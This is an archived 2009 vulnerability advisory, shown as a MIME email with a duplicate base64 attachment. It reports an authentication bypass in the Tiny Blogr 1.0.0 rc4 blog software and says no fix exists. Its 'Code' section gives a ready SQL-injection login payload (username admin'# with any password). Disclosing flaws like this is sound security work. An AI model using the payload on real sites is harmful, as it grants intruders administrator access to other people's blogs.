TUCoPS :: Web :: Blogs

TUCoPS :: Web :: Blogs :: va3205.htm
Tiny Blogr 1.0.0 rc4 Authentication Bypass
Tiny Blogr 1.0.0 rc4 Authentication Bypass Tiny Blogr 1.0.0 rc4 Authentication Bypass

--001636c5b35199b1ea0467bf5942
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Tiny Blogr
[+] Version: 1.0.0 rc4
[+] Website: http://tinyblogr.sourceforge.net 

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 17 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: class.eport.php

This bug allows a guest to bypass the authentication
system.


*************************************************

[+] Code


- [A] Authenticaion Bypass

Username: admin'#
Password: foo


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--001636c5b35199b1ea0467bf5942
Content-Type: text/plain; charset=US-ASCII; 
	name="Tiny Blogr 1.0.0 rc4 Authentication Bypass-17042009.txt"
Content-Disposition: attachment; 
	filename="Tiny Blogr 1.0.0 rc4 Authentication Bypass-17042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftmuyxfy1

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBUaW55IEJsb2dyClsrXSBWZXJzaW9uOiAxLjAuMCByYzQKWytdIFdlYnNpdGU6
IGh0dHA6Ly90aW55YmxvZ3Iuc291cmNlZm9yZ2UubmV0CgpbK10gQnVnczogW0FdIEF1dGhlbnRp
Y2F0aW9uIEJ5cGFzcwoKWytdIEV4cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAxNyBBcHIg
MjAwOQoKWytdIERpc2NvdmVyZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsr
XSBBdXRob3I6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1h
aWw6IGRyb3NvcGhpbGF4eHhAZ21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgK
CgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10g
QnVncwoKCi0gW0FdIEF1dGhlbnRpY2F0aW9uIEJ5cGFzcwoKWy1dIFJpc2s6IG1lZGl1bQpbLV0g
UmVxdWlzaXRlczogbWFnaWNfcXVvdGVzX2dwYyA9IG9mZgpbLV0gRmlsZSBhZmZlY3RlZDogY2xh
c3MuZXBvcnQucGhwCgpUaGlzIGJ1ZyBhbGxvd3MgYSBndWVzdCB0byBieXBhc3MgdGhlIGF1dGhl
bnRpY2F0aW9uCnN5c3RlbS4KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqCgpbK10gQ29kZQoKCi0gW0FdIEF1dGhlbnRpY2Fpb24gQnlwYXNzCgpVc2Vy
bmFtZTogYWRtaW4nIwpQYXNzd29yZDogZm9vCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio--001636c5b35199b1ea0467bf5942--